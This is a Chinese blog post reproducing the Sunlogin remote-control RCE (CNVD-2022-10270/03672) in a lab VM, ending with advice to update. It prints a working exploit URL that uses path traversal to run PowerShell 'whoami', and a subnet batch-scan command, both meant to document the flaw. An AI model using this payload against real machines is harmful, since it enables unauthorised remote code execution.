远程控制漏洞CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现与解决

上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞（CNVD-2022-10270/CNVD-2022-03672），影响Windows系统使用的个人版和简约版，攻击者可利用该漏洞获取服务器控制权。影响版本：向日葵个人版 for Windows <= 11.0.0.33向日葵简约版 <= V1.0.1.43315（2021.12）实验环境：win10虚拟机工具下载(含有

告诉桃花不用开了

3414人浏览 · 2022-03-01 00:03:56

告诉桃花不用开了 · 2022-03-01 00:03:56 发布

上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞（CNVD-2022-10270/CNVD-2022-03672），影响Windows系统使用的个人版和简约版，攻击者可利用该漏洞获取服务器控制权。

影响版本：

向日葵个人版 for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315（2021.12）

实验环境：win10虚拟机

工具下载(含有漏洞版本的向日葵)：
https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

开始复现：

一，工具自动扫描

打开cmd

成功

二、nmap手操扫描

三，手动检测

一个个试IP

http://IP:端口号/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

获取信息

也可以kali自动批量扫描

python3 1.py  -t 192.168.110.234/25

kali工具

解决

点我进入官网下载新版

参考：CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现

华为开发者空间

华为开发者空间，是为全球开发者打造的专属开发空间，汇聚了华为优质开发资源及工具，致力于让每一位开发者拥有一台云主机，基于华为根生态开发、创新。

更多推荐

解析openGauss账本数据库

华为开发者空间

GaussDB的向量化处理技术

华为开发者空间

二十载岁月如磐，一位高校女教师的技术坚守之路

华为开发者空间

所有评论(0)

查看更多评论

告诉桃花不用开了

@Gjqhs

已为社区贡献12条内容